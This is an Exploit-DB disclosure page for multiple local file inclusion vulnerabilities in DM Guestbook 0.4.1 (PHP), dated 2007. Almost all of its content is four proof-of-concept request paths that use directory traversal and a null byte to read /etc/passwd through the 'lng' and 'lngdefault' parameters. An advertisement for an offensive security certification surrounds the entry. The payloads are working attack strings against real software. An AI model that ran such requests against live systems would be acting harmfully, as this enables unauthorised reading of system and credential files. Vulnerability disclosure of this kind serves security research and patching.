DM Guestbook 0.4.1 - Multiple Local File Inclusions

EDB-ID:

4597


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-11-02


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#  DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities
#  http://sourceforge.net/project/showfiles.php?group_id=101364 /guestbook.0.4.1/
#  POC :
#  /guestbook.php?lng=../../../../../../../etc/passwd%00
#  /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00
#  /auto/glob_new.php?lng=../../../../../../../etc/passwd%00
#  /auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00

# milw0rm.com [2007-11-02]